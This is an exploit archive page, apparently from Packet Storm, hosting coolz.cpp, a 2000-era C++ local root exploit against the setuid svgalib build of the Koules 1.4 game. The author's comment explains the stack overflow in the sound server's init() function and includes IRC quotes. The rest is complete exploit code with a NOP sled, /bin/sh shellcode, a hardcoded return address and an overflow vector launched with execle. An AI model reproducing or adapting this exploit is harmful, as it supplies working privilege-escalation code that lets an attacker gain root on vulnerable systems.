exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

coolz.cpp

coolz.cpp
Posted Nov 21, 2000
Authored by Scrippie | Site synnergy.net

Koules v1.4 (svgalib version) local root exploit.

tags | exploit, local, root
SHA-256 | c1aa67a699bdb06becfd648b8e011150782023036520a46cdbdfa729d406a53d

coolz.cpp

Change Mirror Download
/*
Coolz.cpp - yep a C Plus Plus exploit, I like that Strings STL :)

This problem has been known since April this year, but I have not
seen any exploit so far.

First of all I wasn't planning to go and release another ordinary stack
smash, but I found the setuid game on some wargame/hackme I played on.
Funny thing was that the exploitability proved to be a bit harder than I
had anticipated at first.

The problem can be found in the Koules1.4 package, code file:
koules.sndsrv.linux.c - function: init()

The `int i` disappears in the optimization gcc does. Since the strcat()
function concatenates an array of filenames, `argv` gets ruined.
This will cause the first run of the loop to fail.
If argv point somewhere into adressable memory space, the chances of
having a second pointer in there are close to zero, thus the second loop
will fail.
Last of all, if the argv[1] does point to a valid address the string
contained there shouldn't be long enough to overwrite eip a second time,
since that gets us into trouble. That's about it :)
Even then, this ONLY works on machines that have compiled SVGALIB support
in and NOT on the X windows version of 'koules'.

Requested IRC quotes:
<dagger02> ik heb jeuk aan me ballen.

<marshal-> waar ben jij nu mee bezig man
<sArGeAnt> nog een keer sukkel
<sArGeAnt> en je ken es lekker kijken hoe packetjes je modem binnen komen

<gmd-> sex ?

<orangehaw> Scrippie HOU JE MOND OF Ik PACkEt Je ? ;)

<silvio> chicks dig me when i place a bet, cause the mandelbrot sucks
compare to the julia set

<jimjones> 4 years ago there was no aol account i couldnt phish, now my
unix virii grow faster than the petry dish

<dugje> I've seen nasa.gov navy.mil compaq.com and microsoft.com, there
is only one goal left .. *.root-servers.net.

Love goes out to: Hester and Maja
Shouts go out to: Aad de Bruin, Karel Roos, L.G. Weert, Louis Maatman,
Richard Vriesde.
-- We always did feel the same, we just saw it from a
different point of view...
[Bob Dylan - Tangled up in Blue]

<Scrippie> vraag me af wat ze zullen doen bij klpd als ze dat lezen (:
<dugje> ghehe ... je een plaatsje hoger zetten op de priority list ..

-- Scrippie/ronald@grafix.nl
/*

/* Synnergy.net (c) 2000 */

#include <cstdio>
#include <string>
#include <cstdlib>
#include <unistd.h>

#define FILENAME "/usr/local/lib/koules/koules.sndsrv.linux"

#define NOP 'A'
#define NUMNOPS 500
#define RETADDY "\x90\xfe\xff\xbf"
/* Since we return in the cleared environment, we don't need to have a
return address we can influence by command line "offset" arguments */

string heavenlycode =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

char *addytostr(unsigned char *);

using namespace std;

main()
{
string payload, vector;
unsigned int i;
const char *env[3];
const char *ptr_to_bffffffc;

/* Construction of our payload */
payload.append(NUMNOPS, NOP);
payload.append(heavenlycode);

env[0] = payload.c_str();
/* This memory address always contains 0x00000000 */
env[1] = "\xfc\xff\xff\xbf";
env[2] = NULL;

/* Calculate for yourself, and check out: linux/fs/exec.c */
ptr_to_bffffffc =
addytostr((unsigned char *)(0xc0000000-sizeof(void *)-sizeof(FILENAME)
-sizeof(heavenlycode)-sizeof(char *)-1));

for(i=0;i<256;i++) {
vector.append(RETADDY); /* Fill the buffer */
}
/* We do NOT overwrite 'int i' - a register is used after gcc -O */
vector.append(RETADDY); /* Overwrites ebp */
vector.append(RETADDY); /* Overwrites eip */
vector.append(ptr_to_bffffffc); /* Overwrites argv argument */

execle(FILENAME, "Segmentation fault (core dumped)", vector.c_str(), "A",
NULL, env);

perror("execle()");
}

char *addytostr(unsigned char *blaat)
{
char *ret;

if(!(ret = (char *)malloc(sizeof(unsigned char *)+1))) {
perror("malloc()");
exit(EXIT_FAILURE);
}
memcpy(ret, &blaat, sizeof(unsigned char *));
ret[sizeof(unsigned char *)] = 0x00;

return(ret);
}


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close